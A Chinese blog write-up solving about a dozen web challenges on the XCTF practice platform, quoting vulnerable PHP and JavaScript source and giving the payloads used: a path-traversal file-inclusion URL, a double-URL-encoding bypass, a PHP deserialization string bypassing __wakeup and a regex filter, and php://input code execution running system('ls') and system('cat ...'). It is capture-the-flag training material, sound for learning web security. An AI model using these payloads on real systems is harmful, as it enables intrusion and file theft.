攻防世界web前20题WP

baby_web

进去之后发现是/1.php,根据提示“初始页面”,用burpsuite截获index.php,获得flag。
知识点:网页初始页面的文件名一般为index。

warmup

进去之后发现一个滑稽表情,用burpsuite截获数据包后发现有个source.php,打开之后发现页面源代码。

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {//page必须被设置且page必须是字符串,否则将被过滤
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {//如果page在白名单内则合法
                return true;
            }

            $_page = mb_substr(//mb_substr(str,start,length)截取字符串中的一段
                $page,
                0,
                mb_strpos($page . '?', '?')//查找'?'在page中首次出现的位置
            );//将page问号之后的内容截掉
            if (in_array($_page, $whitelist)) {//若此时的page在白名单内则合法
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])//_REQUEST是post和get的集合
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])//要求file也满足上面的要求
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

根据源代码得到提示,找到文件hint.php,得知flag在ffffllllaaaagggg这个文件里。再次进行代码审计,发现底下有个文件包包含,构造payload为:
http://111.200.241.244:60683/source.php?file=source.php?./../../../../ffffllllaaaagggg
就可以得到flag。

Training-WWW-Robots

签到题,科普了一波robots.txt。

PHP2

根据题目提示访问/index.phps获取提示信息:

<?php
if("admin"===$_GET[id]) {//如果id全等于admin则会被过滤
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);//id进行一次url解码
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

构造id=%2561dmin使之在被两次urldecode后等于admin就可获得flag。

Web_php_unserialize

又是一道反序列化的题。打开网页发现源代码。

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { //构造函数,赋值给file
        $this->file = $file; 
    }
    function __destruct() { //析构函数
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { // /i的意思是不区分大小写
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

当Demo被反序列化时,wakeup函数中的内容会被执行,通过构造类中成员属性数目大于实际数目绕过。
var=O:4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}
下面是对var变量的检查,用到了正则表达式,如果var符合开头o:数字的形式就会被过滤,这里采用+号过滤。
构造var=O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";},再进行一次base64加密,构造payload传参即可得到flag。
注意Demofile中的\0,最好直接复制序列化之后的结果来改,不然特殊字符很容易出问题。

php_rce

打开以后发现是个Thinkphp V5的介绍页面,说明要利用Thinkphp框架的漏洞。查阅kali linux自带的漏洞数据库即可获得hack的方法。

使用`searchsploit thinkphp``命令即可查询到可利用的漏洞。

然后远程代码执行,找到flag文件。

Web_php_include

看题目应该是个文件包含。打开页面出一段代码。

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

阅读代码发现,题目简单过滤了"php://"利用php大小写不敏感的特性,构造大写的pHp://绕过过滤。
使用php://input协议,远程执行代码:

<?php
system("ls");
?>

<?php
system("cat fl4gisisish3r3.php");
?>

获取flag。

ics-06

签到。Burpsuite暴力跑字典破解。。。

NewsCenter

注意到网站使用的Sql数据库,使用Sqlmap工具hack。
sqlmap使用教程

NaNNaNNaNNaN-Batman

下载到一段代码:

function $(){
    var
    e=document.getElementById("c").value;
    if(e.length==16)
        if(e.match(/^be0f23/)!=null)
            if(e.match(/233ac/)!=null)
                if(e.match(/e98aa$/)!=null){
                    if(e.match(/c7be9/)!=null){
                        var t=["fl","s_a","i","e}"];
                        var n=["a","_h0l","n"];
                        var r=["g{","e","_0"];
                        var i=["it'","_","n"];
                        var s=[t,n,r,i];
                        for(var o=0;o<13;++o){
                            document.write(s[o%4][0]);s[o%4].splice(0,1)
                        }
                    }
                }
}

js正则表达式审计,但其实可以直接把前面判断的代码删掉,再跑一下生成flag的那段获取flag。

unserialize3

又一道反序列化,打开页面得到代码:

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

这题和上道反序列化题相比完全是两个级别,直接将给的代码反序列化后,绕过wake_up即可得到flag。

posted @ 2022-01-16 22:49  zeroy0410  阅读(124)  评论(0编辑  收藏  举报